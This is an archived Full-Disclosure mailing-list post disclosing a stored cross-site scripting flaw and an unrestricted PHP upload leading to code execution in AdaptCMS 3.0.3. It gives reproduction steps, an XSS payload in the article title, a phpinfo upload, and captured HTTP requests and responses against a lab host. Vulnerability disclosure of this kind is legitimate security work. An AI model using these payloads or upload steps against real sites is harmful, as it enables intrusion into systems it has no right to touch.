lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1acsaMUoTDjTdaXZ7H1HbEmsuC0BW3xg2Vj6Zu8HYQdug@mail.gmail.com> Date: Tue, 6 Feb 2024 16:26:45 +0000 From: Andrey Stoykov <mwebsec@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Stored XSS and RCE - adaptcmsv3.0.3 # Exploit Title: Stored XSS and RCE - adaptcmsv3.0.3 # Date: 02/2024 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Ubuntu 22.04 # Blog: http://msecureltd.blogspot.com *Description* - It was found that adaptcms v3.0.3 was vulnerable to stored cross site scripting - Also the application allowed the file upload functionality to upload PHP files which resulted in remote code execution *Stored XSS* *Steps to Reproduce:* 1. Login as admin and add a new article 2. In "Title" add the following payload <svg><animate onbegin=alert(1) attributeName=x dur=1s> 3. The stored XSS would be triggered upon visiting the article by normal user // HTTP POST request POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1 Host: 192.168.232.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 [...] _method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&*data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E*&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...] // HTTP GET request GET /adaptcms/admin/articles/preview HTTP/1.1 Host: 192.168.232.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 [...] // HTTP response HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 [...] [...] <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> *<title>* * AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x dur=1s> </title>* [...] *Unrestricted File Upload* *Steps to Reproduce:* 1. Login as admin and visit the "Media" page 2. Click on "Files" then use the "Add File" functionality 3. In "File Contents" add the following PHP code <?php phpinfo(); ?> // HTTP POST request POST /adaptcms/admin/files/add HTTP/1.1 Host: 192.168.232.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 [...] [...] ------WebKitFormBoundaryVO2wc6i6YcQWk3oU *Content-Disposition: form-data; name="data[0][File][dir]"* *uploads/* ------WebKitFormBoundaryVO2wc6i6YcQWk3oU Content-Disposition: form-data; name="data[0][File][mimetype]" ------WebKitFormBoundaryVO2wc6i6YcQWk3oU Content-Disposition: form-data; name="data[0][File][filesize]" ------WebKitFormBoundaryVO2wc6i6YcQWk3oU *Content-Disposition: form-data; name="data[File][content]"* *<?php phpinfo(); ?>* ------WebKitFormBoundaryVO2wc6i6YcQWk3oU [...] // HTTP response HTTP/1.1 302 Found Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 *Location: http://192.168.232.133/adaptcms/admin/files <http://192.168.232.133/adaptcms/admin/files>* [...] // HTTP GET request GET /adaptcms/uploads/*test-php.php* HTTP/1.1 Host: 192.168.232.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 [...] // HTTP response HTTP/1.1 200 OK Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 [...] [...] <h1 class="p">*PHP Version 5.6.40*</h1> </td></tr> </table> <table> <tr><td class="e">System </td><td class="v">*Linux ubuntu 6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12 18:54:30 UTC 2 x86_64* </td></tr> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists